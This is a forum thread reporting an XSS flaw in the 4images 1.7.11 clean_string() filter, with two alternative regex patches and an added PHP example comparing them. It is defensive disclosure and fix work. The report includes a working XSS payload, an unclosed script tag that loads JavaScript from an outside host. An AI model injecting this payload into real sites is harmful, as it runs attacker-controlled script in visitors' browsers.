4images Forum & Community

4images Issues / Ausgaben => Feedback & Suggestions => Topic started by: jakovits on June 27, 2013, 06:56:16 PM

Title: 1.7.11 Security fix for XSS issue in global.php
Post by: jakovits on June 27, 2013, 06:56:16 PM
Hello

This is an unofficial security report and a fix for an XSS issue with unclosed HTML tags in the global.php file of 4images gallery version 1.7.11.

Currently the clean_string() function in global.php removes unwanted tags; however, it is unable to remove tags which are not closed properly.

For example, if you add the following line to an image comment field:

Code:
<script src="http://ha.ckers.org/xss.js?"
it will create a JavaScript popup every time the image description is viewed. This vector can be used to enable any XSS attack.

To fix this issue, in file global.php, before line 204, which is:

$string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

add two lines:

$string = preg_replace("/<([^<>]*)(?=<|$)/", "&lt$1",  $string); # replace unclosed '<' (group 1 = text after it)
$string = preg_replace("/(^|(?<=>))([^<>]*)>/", "$2&gt",  $string); # replace unopened '>' (group 2 = text before it, kept)

As a result, any unclosed < or > characters will be replaced respectively with either &lt or &gt. Properly closed tags will remain as they were.


Jakovits
Title: Re: 1.7.11 Security fix for XSS issue in global.php
Post by: kai on July 15, 2013, 06:02:20 PM
Or

find in "global.php"
$string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

and replace with
$string = preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*(>|$)#i',"",$string);
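The following is an added example, not 4images code or either poster's patch: it runs the original 1.7.11 tag-stripping expression, kai's one-line change, and jakovits' two pre-escaping lines side by side on constructed inputs, so the difference in behaviour on an unclosed tag is visible. The entities in the escaping variant are written with a terminating semicolon here, and the second pattern keeps group 2 (the text in front of the stray `>`).

```php
<?php
// Added example, not 4images code. Compares the three variants discussed in
// the thread on the same constructed inputs.
declare(strict_types=1);

const TAGS = 'applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base';

// Behaviour of the original line 204: the tag must end in '>' to be removed.
function strip_original(string $s): string
{
    return preg_replace('#</*(' . TAGS . ')[^>]*>#i', '', $s);
}

// kai's variant: end of string is also accepted as the tag terminator.
function strip_kai(string $s): string
{
    return preg_replace('#</*(' . TAGS . ')[^>]*(>|$)#i', '', $s);
}

// jakovits' pre-pass: neutralise '<' with no matching '>' and '>' with no
// matching '<'. Balanced tags are left for the stripping regex above.
function escape_unbalanced(string $s): string
{
    $s = preg_replace('/<([^<>]*)(?=<|$)/', '&lt;$1', $s);
    $s = preg_replace('/(^|(?<=>))([^<>]*)>/', '$2&gt;', $s);
    return $s;
}

// Constructed samples: the unclosed tag from the report, a properly closed
// tag that the original already handles, and a stray '>' next to a legitimate tag.
$samples = [
    '<script src="http://ha.ckers.org/xss.js?"',
    '<script src="x.js"></script>',
    'price 5 > 3, <b>bold</b>',
];

foreach ($samples as $in) {
    printf("input:    %s\n", $in);
    printf("original: %s\n", strip_original($in));   // first sample passes through unchanged
    printf("kai:      %s\n", strip_kai($in));        // first sample is removed
    printf("escape:   %s\n\n", escape_unbalanced($in)); // first sample becomes &lt;script ...
}
```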